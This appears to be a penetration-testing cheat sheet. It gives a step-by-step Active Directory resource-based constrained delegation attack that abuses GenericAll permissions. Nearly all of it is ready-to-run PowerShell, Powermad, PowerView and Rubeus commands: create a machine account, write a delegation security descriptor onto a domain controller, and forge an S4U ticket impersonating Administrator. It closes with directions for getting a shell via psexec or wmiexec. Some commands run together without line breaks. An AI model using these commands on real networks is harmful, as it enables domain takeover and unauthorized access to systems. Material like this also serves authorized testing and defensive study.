If we have an account with permission GenericAll, we can create or update info of users like passwords, machines, etc.
#Import Powermad and use it to create a new MACHINE ACCOUNTImport-Module .\Powermad.ps1#Or. .\Powermad.ps1# Create new machineNew-MachineAccount-MachineAccount lanz -Password $(ConvertTo-SecureString'buenosdias'-AsPlainText -Force) -Verbose#Import PowerView and get the SID of our new created machine account. .\PowerView.ps1$ComputerSid =Get-DomainComputer lanz -Properties objectsid | Select -Expand objectsid#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes =New-Object byte[] ($SD.BinaryLength)$SD.GetBinaryForm($SDBytes,0)#Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
# Out Target could be: dc.target.comGet-DomainComputer dc |Set-DomainObject-Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose#After that we need to get the RC4 hash of the new machine account's password using RubeusRubeus.exe hash /password:'buenosdias'# Or with Python3import hashlibprint(hashlib.new('md4','buenosdias'.encode('utf-16le')).hexdigest())#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:lanz /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/dc.example.com /domain:example.com /ptt
Take the hash, copy in your machine, decode base64 and use ticketConverter.py to generate the file .ccache, then export the ticket in the environment var KRB5CCNAME=ticket.ccache and use wmiexec, psexec, smbexec, etc. to authenticate, impersonate user and get a Shell.
